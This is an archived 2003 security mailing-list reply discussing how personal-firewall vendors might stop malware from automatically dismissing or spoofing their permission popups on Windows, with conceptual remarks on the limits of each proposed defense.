-> > > > From: nowak.aat_private [mailto:nowak.aat_private] > > Sent: Monday, August 11, 2003 5:15 PM > > > > > > > I suppose a simple defense for "personal firewall" vendors > > > against this sort of thing would be to use hard-to-guess window > > > titles for their popups... > > > > This simple defense may not be enough, as there are ways to > > find out the names of all "child" windows belonging to specific > > process. You'd have to change all the window classes too. It wouldn't be too difficult, depending on how the app works. You could just generate a random string to pre/post-fix. > to require that the window be visible when the event is > received, and have > been visible for some minimum time (even on the order of a > few seconds), > which would allow an alert user to see the trojan in action, anyway. Another way could be to track mouse movements, or keypresses. The problem is, there is just no way to prevent another app from "spoofing" user input directly into the messagepump (unless you use GetAsyncKeyState() etc, but that's a very unreliable way to check for input in a win32 app). Also, consider the case of TweakUI, where you can configure it to pop the mouse to the OK (default) button of any messagebox. Just trying to force the prompt to be visible leaves a whole bunch of other possibilites out too - resize it to 1 pixel, move it offscreen etc... > Is there a reliable mechanism in Windows for distinguishing > between real and > spoofed events? I've never looked into the subject, as I > avoid GUI-mode > programming like the plague (which is an apt description, in my book). As I said above, no, not reliably. You can throw whatever you want into a process' message pump. One way may be to totally randomise the more important messageboxes. Randomly generate a title and string for the buttons, and alter the tab order and default button (similar to how the unregistered version of Winzip swaps it's buttons around). That would probably double the frustration for the user, but would make it harder for the prompt to be automatically dismissed. I can think of another possibility too. Instead of automatically dismissing the messagebox, the malicious app could just rewrite the caption text in the prompt. "Spyware detected, allow access?" could become "Would you like some ice cream?". Now who could say no to that.... Ian Kayne Technical Specialist - IT Solutions Softlab Ltd - A BMW Company ******************************************************************** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you are not the intended recipient or the person responsible for delivering to the intended recipient, be advised that you have received this email in error and that any use of the information contained within this email or attachments is strictly prohibited. Internet communications are not secure and Softlab does not accept any legal responsibility for the content of this message. Any opinions expressed in the email are those of the individual and not necessarily those of the Company. If you have received this email in error, or if you are concerned with the content of this email please notify the IT helpdesk by telephone on +44 (0)121 788 5480. ********************************************************************
This archive was generated by hypermail 2b30 : Tue Aug 12 2003 - 08:59:30 PDT